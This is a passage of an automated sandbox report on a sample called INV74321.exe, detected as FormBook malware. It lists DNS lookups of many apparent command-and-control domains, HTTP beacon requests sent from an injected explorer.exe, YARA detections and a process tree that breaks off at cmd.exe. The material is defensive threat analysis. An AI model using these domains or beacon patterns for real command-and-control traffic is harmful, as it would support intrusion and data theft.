                                                        May 12, 2021 07:36:53.064209938 CEST53612928.8.8.8192.168.2.3
                                                        May 12, 2021 07:36:58.871206999 CEST6361953192.168.2.38.8.8.8
                                                        May 12, 2021 07:36:58.940164089 CEST53636198.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:01.478374004 CEST6493853192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:01.527139902 CEST53649388.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:03.962233067 CEST6194653192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:04.019355059 CEST53619468.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:04.112806082 CEST6491053192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:04.174323082 CEST53649108.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:09.665203094 CEST5212353192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:09.728729963 CEST53521238.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:14.744381905 CEST5613053192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:14.937685966 CEST53561308.8.8.8192.168.2.3
                                                        May 12, 2021 07:37:20.276674986 CEST5633853192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:21.290323019 CEST5633853192.168.2.38.8.8.8
                                                        May 12, 2021 07:37:22.305836916 CEST5633853192.168.2.38.8.8.8

                                                        ICMP Packets

                                                        TimestampSource IPDest IPChecksumCodeType
                                                        May 12, 2021 07:36:20.954955101 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable
                                                        May 12, 2021 07:36:21.998903036 CEST192.168.2.38.8.8.8cff3(Port unreachable)Destination Unreachable

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        May 12, 2021 07:36:15.867855072 CEST192.168.2.38.8.8.80xbfe0Standard query (0)www.aqayeseo.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:16.878719091 CEST192.168.2.38.8.8.80xbfe0Standard query (0)www.aqayeseo.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:17.926945925 CEST192.168.2.38.8.8.80xbfe0Standard query (0)www.aqayeseo.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:24.963274956 CEST192.168.2.38.8.8.80x6b2dStandard query (0)www.king-jackpot.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:30.845324039 CEST192.168.2.38.8.8.80x2265Standard query (0)www.0o-a-8v4l76.netA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:37.451916933 CEST192.168.2.38.8.8.80xfb14Standard query (0)www.downtoearthwork.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:42.629811049 CEST192.168.2.38.8.8.80x2a0dStandard query (0)www.smartmatch-dating-api.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:47.814141989 CEST192.168.2.38.8.8.80xad70Standard query (0)www.topcasino-111.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:52.997044086 CEST192.168.2.38.8.8.80xd165Standard query (0)www.shebagholdings.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:58.871206999 CEST192.168.2.38.8.8.80xaaaaStandard query (0)www.booweats.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:04.112806082 CEST192.168.2.38.8.8.80x4ec2Standard query (0)www.xn--espacesacr-k7a.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:09.665203094 CEST192.168.2.38.8.8.80x451dStandard query (0)www.lingoblasterdiscount.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:14.744381905 CEST192.168.2.38.8.8.80xe832Standard query (0)www.painteredmond.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:20.276674986 CEST192.168.2.38.8.8.80x8d20Standard query (0)www.cylindberg.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:21.290323019 CEST192.168.2.38.8.8.80x8d20Standard query (0)www.cylindberg.comA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:22.305836916 CEST192.168.2.38.8.8.80x8d20Standard query (0)www.cylindberg.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        May 12, 2021 07:36:19.941365004 CEST8.8.8.8192.168.2.30xbfe0Server failure (2)www.aqayeseo.comnonenoneA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:20.953538895 CEST8.8.8.8192.168.2.30xbfe0Server failure (2)www.aqayeseo.comnonenoneA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:21.998647928 CEST8.8.8.8192.168.2.30xbfe0Server failure (2)www.aqayeseo.comnonenoneA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:25.373923063 CEST8.8.8.8192.168.2.30x6b2dNo error (0)www.king-jackpot.comking-jackpot.comCNAME (Canonical name)IN (0x0001)
                                                        May 12, 2021 07:36:25.373923063 CEST8.8.8.8192.168.2.30x6b2dNo error (0)king-jackpot.com119.18.54.126A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:31.456475019 CEST8.8.8.8192.168.2.30x2265No error (0)www.0o-a-8v4l76.net163.43.122.109A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:37.514128923 CEST8.8.8.8192.168.2.30xfb14No error (0)www.downtoearthwork.com104.21.46.55A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:37.514128923 CEST8.8.8.8192.168.2.30xfb14No error (0)www.downtoearthwork.com172.67.223.227A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:42.784970045 CEST8.8.8.8192.168.2.30x2a0dServer failure (2)www.smartmatch-dating-api.comnonenoneA (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:47.875988960 CEST8.8.8.8192.168.2.30xad70No error (0)www.topcasino-111.com87.98.148.38A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:53.064209938 CEST8.8.8.8192.168.2.30xd165No error (0)www.shebagholdings.com154.84.101.247A (IP address)IN (0x0001)
                                                        May 12, 2021 07:36:58.940164089 CEST8.8.8.8192.168.2.30xaaaaNo error (0)www.booweats.com64.190.62.111A (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:04.174323082 CEST8.8.8.8192.168.2.30x4ec2No error (0)www.xn--espacesacr-k7a.comxn--espacesacr-k7a.comCNAME (Canonical name)IN (0x0001)
                                                        May 12, 2021 07:37:04.174323082 CEST8.8.8.8192.168.2.30x4ec2No error (0)xn--espacesacr-k7a.com34.102.136.180A (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:09.728729963 CEST8.8.8.8192.168.2.30x451dName error (3)www.lingoblasterdiscount.comnonenoneA (IP address)IN (0x0001)
                                                        May 12, 2021 07:37:14.937685966 CEST8.8.8.8192.168.2.30xe832No error (0)www.painteredmond.com192.185.0.218A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.king-jackpot.com
                                                        • www.0o-a-8v4l76.net
                                                        • www.downtoearthwork.com
                                                        • www.topcasino-111.com
                                                        • www.shebagholdings.com
                                                        • www.booweats.com
                                                        • www.xn--espacesacr-k7a.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.349727119.18.54.12680C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:25.546082020 CEST1537OUTGET /or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.king-jackpot.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:25.815865040 CEST1538INHTTP/1.1 404 Not Found
                                                        Date: Wed, 12 May 2021 05:36:25 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Wed, 24 Feb 2021 17:47:31 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 583
                                                        Vary: Accept-Encoding
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.349733163.43.122.10980C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:31.764292955 CEST1604OUTGET /or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn HTTP/1.1
                                                        Host: www.0o-a-8v4l76.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:32.071120977 CEST3396INHTTP/1.1 302 Found
                                                        Date: Wed, 12 May 2021 05:36:31 GMT
                                                        Server: Apache/2.2.13 (Unix)
                                                        Location: http://www.0o-a-8v4l76.net/notfound?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn
                                                        Content-Length: 310
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 30 6f 2d 61 2d 38 76 34 6c 37 36 2e 6e 65 74 2f 6e 6f 74 66 6f 75 6e 64 3f 4b 64 54 4c 3d 61 32 4a 78 4f 4e 66 48 26 61 6d 70 3b 69 4e 36 3d 2f 59 71 56 32 59 6f 62 5a 46 47 78 51 44 4d 45 50 52 48 33 46 7a 58 33 73 70 35 36 50 49 7a 79 39 69 6b 35 4e 36 67 38 4f 64 4c 47 51 43 39 51 34 64 49 4a 2f 58 6d 39 33 76 66 74 4e 54 6f 52 64 4a 66 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.0o-a-8v4l76.net/notfound?KdTL=a2JxONfH&amp;iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn">here</a>.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.349734104.21.46.5580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:37.560159922 CEST6033OUTGET /or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.downtoearthwork.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:37.612606049 CEST6034INHTTP/1.1 301 Moved Permanently
                                                        Date: Wed, 12 May 2021 05:36:37 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=3600
                                                        Expires: Wed, 12 May 2021 06:36:37 GMT
                                                        Location: https://www.downtoearthwork.com/or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH
                                                        cf-request-id: 0a00acccd800004ab5f298a000000001
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9b5R7pfybtDNbbE6APLcEI0zQ%2B0r1%2BiHouUEjdrQNb%2FAv87mbz5sBIgFXrhjRVtjB5a8Mu9%2FZRi%2FJ8yhFczUihSJ4lmHqXk%2FI2DhJrSLLXjUzNP6slncdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        X-Content-Type-Options: nosniff
                                                        Server: cloudflare
                                                        CF-RAY: 64e14a5afc2c4ab5-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.34973687.98.148.3880C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:47.928524017 CEST6068OUTGET /or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.topcasino-111.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:47.980216980 CEST6069INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.19.4
                                                        Date: Wed, 12 May 2021 05:36:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 169
                                                        Connection: close
                                                        Location: https://topcasino-111.org/or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.4</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.349737154.84.101.24780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:53.337873936 CEST6070OUTGET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1
                                                        Host: www.shebagholdings.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:54.001211882 CEST6070INHTTP/1.1 404 Not Found
                                                        Transfer-Encoding: chunked
                                                        Server: IIS Microsoft-HTTPAPI/2.0
                                                        X-Powered-By: IIS
                                                        Date: Wed, 12 May 2021 05:36:53 GMT
                                                        Connection: close
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.34973864.190.62.11180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:36:58.988852024 CEST6071OUTGET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.booweats.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:36:59.068284035 CEST6072INHTTP/1.1 302 Found
                                                        date: Wed, 12 May 2021 05:36:59 GMT
                                                        content-type: text/html; charset=UTF-8
                                                        content-length: 0
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0IkIReecyedsKP0Z3ZUlN8WfOeeXlS8fzoYUbPSm0tTmZySD2nnP3pCqIeh4W5JzjK4yuWca9nv5u9W/WSUVrA==
                                                        expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        pragma: no-cache
                                                        last-modified: Wed, 12 May 2021 05:36:59 GMT
                                                        location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                        x-cache-miss-from: parking-5cc4cbb56f-gdph7
                                                        server: NginX
                                                        connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.34974134.102.136.18080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 12, 2021 07:37:04.217828035 CEST6090OUTGET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1
                                                        Host: www.xn--espacesacr-k7a.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        May 12, 2021 07:37:04.354921103 CEST6091INHTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Wed, 12 May 2021 05:37:04 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "609953af-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: INV74321.exe PID: 5520 Parent PID: 5652

                                                        General

                                                        Start time:07:35:08
                                                        Start date:12/05/2021
                                                        Path:C:\Users\user\Desktop\INV74321.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x400000
                                                        File size:579490 bytes
                                                        MD5 hash:877BB5661FE79BB7F48CFB3EA54537A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Analysis Process: INV74321.exe PID: 4604 Parent PID: 5520

                                                        General

                                                        Start time:07:35:09
                                                        Start date:12/05/2021
                                                        Path:C:\Users\user\Desktop\INV74321.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x400000
                                                        File size:579490 bytes
                                                        MD5 hash:877BB5661FE79BB7F48CFB3EA54537A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Analysis Process: explorer.exe PID: 3388 Parent PID: 4604

                                                        General

                                                        Start time:07:35:15
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:
                                                        Imagebase:0x7ff714890000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Analysis Process: wlanext.exe PID: 6292 Parent PID: 3388

                                                        General

                                                        Start time:07:35:29
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\SysWOW64\wlanext.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                        Imagebase:0xd90000
                                                        File size:78848 bytes
                                                        MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        Analysis Process: cmd.exe PID: 6480 Parent PID: 6292

                                                        General

                                                        Start time:07:35:34
